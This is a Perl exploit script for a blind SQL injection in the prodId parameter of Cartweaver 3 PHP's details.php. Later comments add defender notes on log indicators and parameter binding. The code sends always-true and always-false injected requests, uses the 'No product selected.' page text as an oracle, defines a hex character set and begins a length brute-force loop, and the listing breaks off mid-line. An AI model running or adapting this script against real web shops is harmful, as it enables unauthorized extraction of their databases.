1 #!/usr/bin/perl
2 ######################
3 #
4 #Cartweaver 3 PHP Blind SQL Injection Substring Vulnerability
5 #
6 ######################
7 #
8 #Bug by: h0yt3r
9 #
10 #Dork: n/a (brainusing required)
11 #
12 ##
13 ###Releasing it to the public
14 ##
15 #
16 #No error messages are being returned.
17 #Exploit needs a valid Product ID!
18 #
19 #SQL Injection:
20 #http://[target]/[path]/details.php?prodId=[SQL]
21 #
22 ##
23 #Gr33tz go to:
24 #b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the neverdying h4ck-y0u Team
25 #
26 ################
27 use LWP::UserAgent;
# HTTP client object used for every request this script sends.
my $userAgent = LWP::UserAgent->new;

# usage() is defined outside this part of the listing. It is called
# unconditionally, before any argument has been looked at.
usage();

# Positional arguments: host, shop path and an existing product id.
# They are stored in package globals (no `my`), exactly as the original does.
($server, $dir, $prod_id) = @ARGV[0 .. 2];

print "\n";

# Only the second argument is checked for presence; a missing product id is
# not caught here and surfaces later as a failed check.
die "Read Usage!\n" unless $dir;

# The page named in the header comment: details.php?prodId=[SQL].
$filename = "details.php";

# Base URL of the page under test. Host, path and file name are joined with
# no separator inserted, and the scheme is fixed to plain http.
my $vulnCheck = join '', 'http://', $server, $dir, $filename;
44
# Candidate byte values as two-digit hex strings, in the original order:
#   61-7A  a-z            3A ':'   5F '_'
#   31-39, 30  digits     21 '!'   23 '#'   2B '+'   28 '('   29 ')'
#   40 '@'   2D '-'   F5 (non-ASCII)   25 '%'   26 '&'   2F '/'   3F '?'
# NOTE(review): the code that consumes this list lies outside this part of
# the listing, so how each value is compared cannot be confirmed from here.
# NOTE(review): "25" was split by a line wrap in the listing ("2" / "5") and
# is rejoined below -- confirm against an unwrapped copy.
my @Daten = qw(
    61 62 63 64 65 66 67 68 69 6A 6B 6C 6D 6E 6F
    70 71 72 73 74 75 76 77 78 79 7A
    3A 5F
    31 32 33 34 35 36 37 38 39 30
    21 23 2B 28 29 40 2D F5 25 26 2F 3F
);
46
print "[x]Connecting:";

# Probe pair for the prodId parameter: the same product id followed by an
# always-true predicate (goodSite) and an always-false one (badSite).
# Defender's view: a prodId value carrying "AND 1=1" / "AND 1=0" in requests
# to details.php is a direct log-search and WAF-rule indicator, and handling
# prodId as a bound integer parameter makes both requests resolve identically.
my ($goodSite, $badSite) =
    map { sprintf '%s?prodId=%s AND %s', $vulnCheck, $prod_id, $_ } ('1=1', '1=0');
50
# Fetch both probe URLs up front; each response is an HTTP response object.
my $Attack1 = $userAgent->get($goodSite);
my $Attack2 = $userAgent->get($badSite);

# Only the always-true request is checked for HTTP success. If it failed,
# report the URL and stop.
unless ($Attack1->is_success) {
    print " Connection Failed to $goodSite";
    exit;
}

print " Connected \n";
print "[x]Vulnerable Check: ";

# The application's "No product selected." text is the oracle. The check
# passes only when the always-false request shows it and the always-true
# request does not, i.e. when the appended predicate changed which page was
# rendered. Once prodId is no longer evaluated as SQL, both responses match
# and this branch reports "Not Vulnerable".
# The '.' in the pattern is unescaped and therefore matches any character.
my $no_product_re = qr/No product selected./i;

if (   $Attack2->content =~ $no_product_re
    && $Attack1->content !~ $no_product_re)
{
    print "Vulnerable! \n";
}
else {
    # Same message for "not injectable" and "product id does not exist":
    # the two cases are indistinguishable to this check.
    print "Not Vulnerable or wrong Product ID";
    exit;
}
69
70
# State for the stage announced below. $hex starts as an empty string,
# $length stays undefined here, and the counter starts at 1.
# NOTE(review): the loop that uses these variables runs past the end of this
# part of the listing, so their exact roles are not visible from here.
my $hex           = "";
my $length;
my $lengthCounter = 1;

print "[x]Bruteforcing Length \n";
77 while(1)
78 {
79 my $url = "".$vulnCheck."?prodId=".$prod_id."%20and